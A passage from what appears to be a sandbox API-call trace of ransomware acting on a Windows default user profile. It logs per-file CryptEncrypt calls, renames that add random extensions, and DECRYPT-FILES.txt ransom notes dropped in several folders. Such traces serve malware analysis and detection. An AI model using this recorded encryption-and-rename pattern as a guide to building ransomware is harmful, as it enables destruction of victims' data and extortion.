hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.417] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.417] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.418] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.418] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.419] CloseHandle (hObject=0x0) returned 0 [0088.419] CloseHandle (hObject=0x428) returned 1 [0088.419] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.419] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 47 [0088.419] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.p82hb") returned 53 [0088.419] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.p82hb" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.p82hb"), dwFlags=0x0) returned 1 [0088.420] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0088.420] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.420] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.420] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.420] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.421] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.421] CloseHandle (hObject=0x0) returned 0 [0088.422] CloseHandle (hObject=0x428) returned 1 [0088.422] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.422] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 54 [0088.422] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.p82hb") returned 60 [0088.422] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.p82hb" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.p82hb"), dwFlags=0x0) returned 1 [0088.423] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\\\jkbimi8.tmp") returned 52 [0088.423] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\favorites\\windows live\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.425] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0088.425] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.425] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\\\DECRYPT-FILES.txt") returned 58 [0088.425] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\windows live\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.425] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.426] CloseHandle (hObject=0x414) returned 1 [0088.426] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0088.426] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0088.426] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.426] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.427] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.427] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.427] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.428] CloseHandle (hObject=0x0) returned 0 [0088.428] CloseHandle (hObject=0x428) returned 1 [0088.428] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.428] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 60 [0088.428] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.p82hb") returned 66 [0088.428] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.p82hb" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.p82hb"), dwFlags=0x0) returned 1 [0088.429] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0088.429] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0088.429] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.429] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.429] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.430] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.430] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.431] CloseHandle (hObject=0x0) returned 0 [0088.431] CloseHandle (hObject=0x428) returned 1 [0088.431] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.431] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 64 [0088.431] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.p82hb") returned 70 [0088.431] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.p82hb" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.p82hb"), dwFlags=0x0) returned 1 [0088.432] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0088.432] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.432] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.432] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.433] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.433] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.434] CloseHandle (hObject=0x0) returned 0 [0088.434] CloseHandle (hObject=0x428) returned 1 [0088.434] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.434] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 61 [0088.434] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.c7OYK") returned 67 [0088.435] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.c7OYK" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.c7oyk"), dwFlags=0x0) returned 1 [0088.435] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0088.435] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.435] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.435] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.436] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.436] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.437] CloseHandle (hObject=0x0) returned 0 [0088.437] CloseHandle (hObject=0x428) returned 1 [0088.437] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.437] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 63 [0088.437] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.c7OYK") returned 69 [0088.437] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.c7OYK" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.c7oyk"), dwFlags=0x0) returned 1 [0088.438] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0088.438] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Links\\\\jkbimi8.tmp") returned 35 [0088.438] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\links\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.440] lstrlenW (lpString="C:\\Users\\Default\\Links\\") returned 23 [0088.440] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.440] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Links\\\\DECRYPT-FILES.txt") returned 41 [0088.440] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\links\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.440] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.441] CloseHandle (hObject=0x434) returned 1 [0088.441] lstrlenW (lpString="C:\\Users\\Default\\Links\\") returned 23 [0088.442] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Links\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0088.442] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Music\\\\jkbimi8.tmp") returned 35 [0088.442] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\music\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.442] lstrlenW (lpString="C:\\Users\\Default\\Music\\") returned 23 [0088.442] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.442] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Music\\\\DECRYPT-FILES.txt") returned 41 [0088.442] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.442] lstrlenW (lpString="C:\\Users\\Default\\Music\\") returned 23 [0088.443] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Music\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0088.443] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\My Documents\\\\jkbimi8.tmp") returned 42 [0088.443] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\my documents\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.443] lstrlenW (lpString="C:\\Users\\Default\\My Documents\\") returned 30 [0088.443] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.443] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\My Documents\\\\DECRYPT-FILES.txt") returned 48 [0088.443] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\my documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.443] lstrlenW (lpString="C:\\Users\\Default\\My Documents\\") returned 30 [0088.444] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\NetHood\\\\jkbimi8.tmp") returned 37 [0088.444] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\nethood\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.444] lstrlenW (lpString="C:\\Users\\Default\\NetHood\\") returned 25 [0088.444] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.444] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\NetHood\\\\DECRYPT-FILES.txt") returned 43 [0088.444] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\nethood\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.444] lstrlenW (lpString="C:\\Users\\Default\\NetHood\\") returned 25 [0088.444] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0088.446] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.446] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.446] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e2d0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e2d0*=0x100) returned 1 [0088.452] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.452] WriteFile (in: hFile=0x430, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e2f0, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e2f0*=0x108, lpOverlapped=0x0) returned 1 [0088.453] CloseHandle (hObject=0x0) returned 0 [0088.453] CloseHandle (hObject=0x430) returned 1 [0088.454] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.454] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0088.454] wsprintfW (in: param_1=0x3f2e39c, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.LOG1.sVG4Jj") returned 39 [0088.454] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.sVG4Jj" (normalized: "c:\\users\\default\\ntuser.dat.log1.svg4jj"), dwFlags=0x0) returned 1 [0088.454] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0088.455] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0088.456] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.456] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.456] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e2d0*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e2d0*=0x100) returned 1 [0088.458] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.458] WriteFile (in: hFile=0x430, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e2f0, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e2f0*=0x108, lpOverlapped=0x0) returned 1 [0088.459] CloseHandle (hObject=0x0) returned 0 [0088.460] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.460] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 72 [0088.460] wsprintfW (in: param_1=0x3f2e39c, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj") returned 79 [0088.460] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.svg4jj"), dwFlags=0x0) returned 1 [0088.463] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0088.464] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.464] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.464] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2e2d0*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2e2d0*=0x100) returned 1 [0088.480] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.480] WriteFile (in: hFile=0x430, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e2f0, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2e2f0*=0x108, lpOverlapped=0x0) returned 1 [0088.481] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.481] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0088.481] wsprintfW (in: param_1=0x3f2e39c, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f") returned 117 [0088.481] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: 